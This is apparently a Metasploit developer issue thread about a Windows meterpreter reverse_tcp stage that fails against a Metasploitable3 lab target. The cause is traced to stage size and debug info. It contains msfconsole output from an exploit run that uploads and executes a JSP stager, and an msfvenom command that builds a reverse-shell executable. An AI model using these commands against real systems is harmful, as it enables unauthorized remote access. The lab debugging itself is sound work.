Stager fails to load using windows/meterpreter/reverse_tcp with badchars = '\0x00'

[wchen-r7]

While testing this vulnerability for Metasploitable3, James and I are noticing windows/meterpreter/reverse_tcp is always causing this error:

Errno::ECONNRESET Connection reset by peer - SSL_accept

msfconsole output:

msf exploit(manageengine_connectionid_write) > run

[*] Started reverse TCP handler on 192.168.1.221:4444 
[*] Creating JSP stager
[*] Uploading JSP stager rjWLG.jsp...
[*] Executing stager...
[*] Sending stage (983599 bytes) to 192.168.1.223
[-] Errno::ECONNRESET Connection reset by peer - SSL_accept

The backtrace:

[10/24/2016 15:08:30] [e(0)] core: Exception raised from handle_connection: Errno::ECONNRESET: Connection reset by peer - SSL_accept

/Users/sinn3r/rapid7/msf/lib/rex/post/meterpreter/client.rb:178:in `accept'
/Users/sinn3r/rapid7/msf/lib/rex/post/meterpreter/client.rb:178:in `swap_sock_plain_to_ssl'
/Users/sinn3r/rapid7/msf/lib/rex/post/meterpreter/client.rb:156:in `init_meterpreter'
/Users/sinn3r/rapid7/msf/lib/msf/base/sessions/meterpreter.rb:78:in `initialize'
/Users/sinn3r/rapid7/msf/lib/msf/base/sessions/meterpreter_x86_win.rb:16:in `initialize'
/Users/sinn3r/rapid7/msf/lib/msf/core/handler.rb:202:in `new'
/Users/sinn3r/rapid7/msf/lib/msf/core/handler.rb:202:in `create_session'
/Users/sinn3r/rapid7/msf/lib/msf/core/payload/stager.rb:236:in `handle_connection_stage'
/Users/sinn3r/rapid7/msf/lib/msf/core/payload/stager.rb:222:in `handle_connection'
/Users/sinn3r/rapid7/msf/lib/msf/core/handler/reverse_tcp.rb:139:in `block (2 levels) in start_handler'
/Users/sinn3r/rapid7/msf/lib/msf/core/handler/reverse_tcp.rb:116:in `loop'
/Users/sinn3r/rapid7/msf/lib/msf/core/handler/reverse_tcp.rb:116:in `block in start_handler'
/Users/sinn3r/rapid7/msf/lib/msf/core/thread_manager.rb:100:in `block in spawn'

If we use windows/shell_reverse_tcp, the payload session works properly. So at first glance, it problem seems more specific to meterpreter.

[bcook-r7]

I can reproduce, checking it out now.

[bcook-r7]

looks related to the size of the stage. If I shrink it by 32k (removing some code), it works.

[bcook-r7]

this started failing around metasploit-payloads 1.1.21 or so, when adding the localtime command. that seems to have pushed the size threshold over.

[bcook-r7]

PR submitted for the original issue, but this can be reproduced more directly (will update the title)

./msfvenom -p windows/meterpreter/reverse_tcp -f exe -o ../metasploitable3/test.exe LHOST=172.28.128.1 -b '\x00'

[bcook-r7]

darn it, debug info being enabled by default seems to have caused the underlying problem (itself also a not-quite-explainable problem yet, but it does at least have a more general fix) - thanks @megabug for noticing this.